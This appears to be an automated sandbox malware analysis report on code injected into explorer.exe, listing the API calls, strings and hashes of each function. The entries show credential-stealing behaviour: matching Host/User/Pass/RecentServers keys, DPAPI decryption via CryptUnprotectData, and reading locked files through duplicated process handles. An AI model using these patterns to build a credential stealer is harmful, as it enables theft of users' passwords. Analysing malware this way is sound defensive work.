                                                                                                                                                        • Part of subcall function 00A01011: GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
                                                                                                                                                        • Part of subcall function 00A01011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
                                                                                                                                                        • Part of subcall function 00A019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A1E
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A3C
                                                                                                                                                        • Part of subcall function 00A019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00A01A75
                                                                                                                                                        • Part of subcall function 00A019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01A98
                                                                                                                                                      Strings
                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00A01B40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                      • API String ID: 2162223993-2036018995
                                                                                                                                                      • Opcode ID: 7ac2dee442b54e284f1b21d790af41fe460c3d52acc9ff7cc15591e45683d04f
                                                                                                                                                      • Instruction ID: fa4a052f8d466780b674de4e0df4693674cd6604bc18db7948c25bea0e32e99a
                                                                                                                                                      • Opcode Fuzzy Hash: 7ac2dee442b54e284f1b21d790af41fe460c3d52acc9ff7cc15591e45683d04f
                                                                                                                                                      • Instruction Fuzzy Hash: 9AF0E03670064C17D7116E2AEC80EB73A9ED7D23D73070029F56AC3281DF266C415174
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00A0A35F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                      • String ID: winSeekFile
                                                                                                                                                      • API String ID: 973152223-3168307952
                                                                                                                                                      • Opcode ID: ba80436324bdd92fd09acbdd9f1d1bb604be89a009f2f0e7673f254ec4b803a6
                                                                                                                                                      • Instruction ID: 504680fb4fe77a2fc018ae53ac6d3e91562db755048c9c9b2f8ee42a0c566ca0
                                                                                                                                                      • Opcode Fuzzy Hash: ba80436324bdd92fd09acbdd9f1d1bb604be89a009f2f0e7673f254ec4b803a6
                                                                                                                                                      • Instruction Fuzzy Hash: A0F0BE34614308BFD711DFA4EC019BB7BBAEB54321F14C769F961CA2D0EA70DD0596A2
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(04FF0000,00000000,?), ref: 00A09EB5
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapAlloc %u bytes (%lu), heap=%p, xrefs: 00A09ECD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: failed to HeapAlloc %u bytes (%lu), heap=%p
                                                                                                                                                      • API String ID: 1279760036-667713680
                                                                                                                                                      • Opcode ID: 5283493db5d4de63a4cf58035e9da67808ac0daaa9a34d4b1e04e229ebd967e7
                                                                                                                                                      • Instruction ID: f67d02c978676639b0a1c4efbbf8271d22178871746ec3abda629fc55bd9f733
                                                                                                                                                      • Opcode Fuzzy Hash: 5283493db5d4de63a4cf58035e9da67808ac0daaa9a34d4b1e04e229ebd967e7
                                                                                                                                                      • Instruction Fuzzy Hash: EEE0C273A082107BC212A7C4BC05F2FBB78EBA4F90F050415FE04A62A1C6B0AC02C7A2
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(04FF0000,00000000,?), ref: 00A09EF8
                                                                                                                                                      Strings
                                                                                                                                                      • failed to HeapFree block %p (%lu), heap=%p, xrefs: 00A09F0E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: failed to HeapFree block %p (%lu), heap=%p
                                                                                                                                                      • API String ID: 3298025750-4030396798
                                                                                                                                                      • Opcode ID: a505afd1c841de9e7b3e60cda2d84e908929d84e55e8d669ea37584a0a215de7
                                                                                                                                                      • Instruction ID: 79909363b766c9ff07561576b36be078eef3d02039c5f363736ef883982e0062
                                                                                                                                                      • Opcode Fuzzy Hash: a505afd1c841de9e7b3e60cda2d84e908929d84e55e8d669ea37584a0a215de7
                                                                                                                                                      • Instruction Fuzzy Hash: A3D012725082027BD2019BD4BC46F2F7B79ABA5B40F480418F604A50E6D7B56452AB61
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00A02893,00000000,00000000,00000000,?), ref: 00A01B82
                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 00A01B8F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: c61e762ef3cf9b5e260f4fe381da1c2e79e90d4216adac130e9dc3d8089f1e7b
• Instruction ID: 49828ca0d6ecda711c952b8207b35fa4f0cf14ee2d1a947bc6d6d39987b10b58
• Opcode Fuzzy Hash: c61e762ef3cf9b5e260f4fe381da1c2e79e90d4216adac130e9dc3d8089f1e7b
• Instruction Fuzzy Hash: F6D0E2A125263062E5B667657C08EE76E1CAF03BBAB444618B41D960D0E2248C8782E0

APIs
  • Part of subcall function 00A01162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00A0116F
• GetProcessHeap.KERNEL32(00000000,00000000,?,00A01A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2), ref: 00A01020
• RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00A01AE2,PortNumber,00000000,00000000), ref: 00A01027
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: Heap$FreeProcessQueryVirtual
• String ID:
• API String ID: 2580854192-0
• Opcode ID: c4191d8c6e7b31bd1d87697c4e8f8a69203f93b7eff8a3367d54eac6b0324e2f
• Instruction ID: 8cc2f8a9db5568875ffeff5729a9b120daab61d81a8d67700b0427b2c7ddcaca
• Opcode Fuzzy Hash: c4191d8c6e7b31bd1d87697c4e8f8a69203f93b7eff8a3367d54eac6b0324e2f
• Instruction Fuzzy Hash: 33C08C3100032052C9A06BE03D0CBDA2B08FF09323F400241B60193182CA658C4286A0

APIs
• RtlZeroMemory.NTDLL(?,00000018), ref: 00A012B5
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: MemoryZero
• String ID:
• API String ID: 816449071-0
• Opcode ID: bf54a494d9fc73d4286726cad9fcab97f8a4ecf647995e1f02b856559e3bd5ba
• Instruction ID: 1505845ef6c8687a18a7a6e2d94eb08c53a40e159c5fe994cce7cc2a44188d31
• Opcode Fuzzy Hash: bf54a494d9fc73d4286726cad9fcab97f8a4ecf647995e1f02b856559e3bd5ba
• Instruction Fuzzy Hash: 0311D2B1A01209AFDB10DFA9E984AFEBBBCFB08341B504129F945E7240D7349D01CB60

APIs
• GetFileAttributesW.KERNELBASE(00000000,00000000,00A02C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00A01BAA
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: 8863b78e52562619b81f70c92c53fedb8a70e8866e13ba688e19c5056690b30c
• Instruction ID: 1de596a18ec9eca8ac9a3f0377c165a36385e5f8ed72599108784e1dc1cff9ff
• Opcode Fuzzy Hash: 8863b78e52562619b81f70c92c53fedb8a70e8866e13ba688e19c5056690b30c
• Instruction Fuzzy Hash: C8D0C933E1653582DA6457B878848D6B6906A4277635A07B4FC26F75D4E325CC8352D0

APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A01684
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: CreateGlobalStream
• String ID:
• API String ID: 2244384528-0
• Opcode ID: 5a9788192ae3526678a8c94ac7ec264db65bd0d199da85932f43aff090ad8f7c
• Instruction ID: 09a1c0d6b3c79a7322cd90cff17f39e5a145c5c6a82773f5855499ff8e4c8b8b
• Opcode Fuzzy Hash: 5a9788192ae3526678a8c94ac7ec264db65bd0d199da85932f43aff090ad8f7c
• Instruction Fuzzy Hash: 8BC01230520221AEE7601BA09C09BCA26D4AF197A2F0A0A2AA0819A0C0E2A508C08A90

APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00A0158A), ref: 00A01056
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 209ae1fdf9e75bca1f477b955e5cc26fd30f7cfb8d390dc6cbdeb4990ae19379
• Instruction ID: d28a5b92003d74a71ed862e2af83e3c50f6e3079066ec48b2f8c040bcc8a48d0
• Opcode Fuzzy Hash: 209ae1fdf9e75bca1f477b955e5cc26fd30f7cfb8d390dc6cbdeb4990ae19379
• Instruction Fuzzy Hash: E9A002F07D53007AFDA997A2AE1FF552938A740F03F504344B30D7D0D055E47501852D

APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00A04A5B,?,?,00000000,?,?,?,?,00A04B66,?), ref: 00A01065
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
• Opcode ID: 892d7cb6a763827318dec2621c5e74ef33c23d17cb6510246c6dd48704ac0052
• Instruction ID: 13a615bd05f740a3a2afee24a58f7347c549acb822a7a5409af1511bdf047c86
• Opcode Fuzzy Hash: 892d7cb6a763827318dec2621c5e74ef33c23d17cb6510246c6dd48704ac0052
• Instruction Fuzzy Hash: 86A00270690B0066EDF497605D0AF1526147740B03F6046447241AB0D14DA5E0458A18

APIs
• CoCreateInstance.COMBASE(00A562B0,00000000,00000001,00A562A0,?), ref: 00A0445F
• SysAllocString.OLEAUT32(?), ref: 00A044AA
• lstrcmpiW.KERNEL32(RecentServers,?), ref: 00A0456E
• lstrcmpiW.KERNEL32(Servers,?), ref: 00A0457D
• lstrcmpiW.KERNEL32(Settings,?), ref: 00A0458C
  • Part of subcall function 00A011E1: lstrlenW.KERNEL32(?,771AF360,00000000,?,00000000,?,00A046E3), ref: 00A011ED
  • Part of subcall function 00A011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A0120F
  • Part of subcall function 00A011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01231
• lstrcmpiW.KERNEL32(Server,?), ref: 00A045BE
• lstrcmpiW.KERNEL32(LastServer,?), ref: 00A045CD
• lstrcmpiW.KERNEL32(Host,?), ref: 00A04657
• lstrcmpiW.KERNEL32(Port,?), ref: 00A04679
• lstrcmpiW.KERNEL32(User,?), ref: 00A0469F
• lstrcmpiW.KERNEL32(Pass,?), ref: 00A046C5
• wsprintfW.USER32 ref: 00A0471E
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
• String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
• API String ID: 2230072276-1234691226
• Opcode ID: 65c5a396df1ff65c819715c64397eea5ced345c1325093db6f2155479da0399e
• Instruction ID: 548f39aeadedf7a9ea015b46c296eda31e2af46476a4731c3bd34e3dfab28662
• Opcode Fuzzy Hash: 65c5a396df1ff65c819715c64397eea5ced345c1325093db6f2155479da0399e
• Instruction Fuzzy Hash: 7EB1F7B1204306AFD740DF64D884E6AB7E9FFC9745F10895CF6858B2A0DB71E90ACB52

APIs
• CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 00A034C0
  • Part of subcall function 00A033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00A03401
• OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A034E9
  • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
  • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00A0351E
• NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00A03541
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00A03586
• DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 00A0358F
• lstrcmpiW.KERNEL32(00000000,File), ref: 00A035B6
• NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 00A035DE
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00A035F6
• StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00A03606
• lstrcmpiW.KERNEL32(00000000,00000000), ref: 00A0361E
• GetFileSize.KERNEL32(?,00000000), ref: 00A03631
• SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00A03658
• SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00A0366B
• ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A03681
• SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00A036AD
• CloseHandle.KERNEL32(?), ref: 00A036C0
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A036F5
  • Part of subcall function 00A01C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CC0
  • Part of subcall function 00A01C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CDA
  • Part of subcall function 00A01C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00A01CE6
• CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,00A037A8), ref: 00A03707
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
• String ID: File
• API String ID: 3915112439-749574446
• Opcode ID: dde75ced568149db1569dc0acd01440bf304542ae50f5fd8524cab4adb9ba796
• Instruction ID: 636a03b48524c6c27d8123485b21b0b8d84b2a5638c7523d4dd40c500b2038a5
• Opcode Fuzzy Hash: dde75ced568149db1569dc0acd01440bf304542ae50f5fd8524cab4adb9ba796
• Instruction Fuzzy Hash: 99619E71204308BFDB20AF61EC84B6B7BADFF84755F400928F986972E1DB36DA458B51

APIs
• memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00A54502
• memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 00A5475F
• memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00A54803
Strings
Memory Dump Source
• Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
Similarity
• API ID: memcmp$memcpy
                                                                                                                                                      • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                      • API String ID: 231171946-1096842476
                                                                                                                                                      • Opcode ID: ba27e4f2a96411d9f0849277583d9e85eb78501a9d2a35972ac776997d36b5f8
                                                                                                                                                      • Instruction ID: ab45dab171e6e914e700a74d525221f81dbf5132feb18342ff8596a392d2a6e1
                                                                                                                                                      • Opcode Fuzzy Hash: ba27e4f2a96411d9f0849277583d9e85eb78501a9d2a35972ac776997d36b5f8
                                                                                                                                                      • Instruction Fuzzy Hash: 23C1E2709083459BDB348F28949076AB7E1BB8E31EF14096EECD587282E734DC8D8756
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,$-x0$Inf$NaN
                                                                                                                                                      • API String ID: 0-2346028406
                                                                                                                                                      • Opcode ID: c532d68bdd9bd8ebd15eea1ed55fbe1a769a1b1a665b1864aa2ff3a9213d7ffe
                                                                                                                                                      • Instruction ID: d844cc9726978a06caf6ce86dad09d5f721bbd8e9de6fdd62ec77ec0240a2b14
                                                                                                                                                      • Opcode Fuzzy Hash: c532d68bdd9bd8ebd15eea1ed55fbe1a769a1b1a665b1864aa2ff3a9213d7ffe
                                                                                                                                                      • Instruction Fuzzy Hash: 8B62F371E0C3868BD7268F28E49036EBFE1AF95344F28495DF4C2973D2D671AD458B82
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A06AAA: memset.NTDLL ref: 00A06AC5
                                                                                                                                                      • memset.NTDLL ref: 00A25F53
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                                                      • API String ID: 2221118986-594550510
                                                                                                                                                      • Opcode ID: 32027848600c4484cf7039fdf1328a8c2638a1a3fb7a40a12ef3cff625f7cfa4
                                                                                                                                                      • Instruction ID: 90aad96f6b992ed56637400fae42f8a7aa04136a7e4fdd7f192c87942611609e
                                                                                                                                                      • Opcode Fuzzy Hash: 32027848600c4484cf7039fdf1328a8c2638a1a3fb7a40a12ef3cff625f7cfa4
                                                                                                                                                      • Instruction Fuzzy Hash: 90C1B070A09711AFCB14DF28D580A6EB7E2BFC8704F14892DF89497281DB35ED56CB92
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00A02127
                                                                                                                                                      • _alldiv.NTDLL(?,?,00989680,00000000), ref: 00A0213A
                                                                                                                                                      • wsprintfA.USER32 ref: 00A0214F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                                                      • String ID: %li
                                                                                                                                                      • API String ID: 4120667308-1021419598
                                                                                                                                                      • Opcode ID: c44fd4c23b6fbac9a06bd209f084e106a845c806ee3ff4a3b3b39f53fe1f8fc8
                                                                                                                                                      • Instruction ID: ebdeeba3b39675d0417a3cbfefe164f40f737ccf4684161fb2d24f27c7fa5029
                                                                                                                                                      • Opcode Fuzzy Hash: c44fd4c23b6fbac9a06bd209f084e106a845c806ee3ff4a3b3b39f53fe1f8fc8
                                                                                                                                                      • Instruction Fuzzy Hash: 13E09232A4020877D7217BB89D06EEE7B6CFB40B17F404291F900A3182E5724A6583D5
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00A03E4B,00000000), ref: 00A0124A
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01268
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01295
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                                      • Opcode ID: 5f94672624c730bf633a04377660afb43325269ab53f0335e86cf320774e1376
                                                                                                                                                      • Instruction ID: 1b586b61fa5cc0f1fb72a8ab6fa2c24187c56e5b69b5d02a637d76f73e4a4f50
                                                                                                                                                      • Opcode Fuzzy Hash: 5f94672624c730bf633a04377660afb43325269ab53f0335e86cf320774e1376
                                                                                                                                                      • Instruction Fuzzy Hash: 9A014F71214305AFE718CF55DC89FBBB7ACFB84761F00462EF50186290EBA19C068660
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(?,771AF360,00000000,?,00000000,?,00A046E3), ref: 00A011ED
                                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A0120F
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00A01231
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcesslstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 117552131-0
                                                                                                                                                      • Opcode ID: 6e8f15fef1752dc186e2ca1950348f68e930a4844c73fb851fd85997f7ba70a5
                                                                                                                                                      • Instruction ID: ab8ec7e64014512941f2297e32e64f6554d85b1f470c3be3c59a65711412b203
                                                                                                                                                      • Opcode Fuzzy Hash: 6e8f15fef1752dc186e2ca1950348f68e930a4844c73fb851fd85997f7ba70a5
                                                                                                                                                      • Instruction Fuzzy Hash: CFF0627220430D7BE210DE96EC81FE77B9DEB95795F15002AB60183181DAA2ED0542B4
                                                                                                                                                      APIs
                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00A01FFA
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00A02015
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CryptDataMemoryMoveUnprotect
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2807545630-0
                                                                                                                                                      • Opcode ID: 43c820208c9c23feeb6d4fa49e885ea6a97f95239a78caa66331326423079e2f
                                                                                                                                                      • Instruction ID: 92210e6758197402f7deceddc8a2cc1321761d8680dafa12941b13a78b8b7b66
                                                                                                                                                      • Opcode Fuzzy Hash: 43c820208c9c23feeb6d4fa49e885ea6a97f95239a78caa66331326423079e2f
                                                                                                                                                      • Instruction Fuzzy Hash: 32011E71A0131DABDB14DF9AEC849AFBBBCEF05350B10416AF905D3240D7719E00CBA0
                                                                                                                                                      APIs
                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 00A011B2
                                                                                                                                                        • Part of subcall function 00A01000: GetProcessHeap.KERNEL32(00000008,?,00A011C7,?,?,00000001,00000000,?), ref: 00A01003
                                                                                                                                                        • Part of subcall function 00A01000: RtlAllocateHeap.NTDLL(00000000), ref: 00A0100A
                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 00A011D2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000E.00000002.1756876625.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_14_2_a01000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BinaryCryptHeapString$AllocateProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3825993179-0
                                                                                                                                                      • Opcode ID: 20328e0aded97bdd1cae6fa515b827c614da696f4155c7357ec1844de188b76e
                                                                                                                                                      • Instruction ID: cbe6eac19c966175e700660e2114a77a49504feb7b50f1a45038960c62d32d8e
                                                                                                                                                      • Opcode Fuzzy Hash: 20328e0aded97bdd1cae6fa515b827c614da696f4155c7357ec1844de188b76e
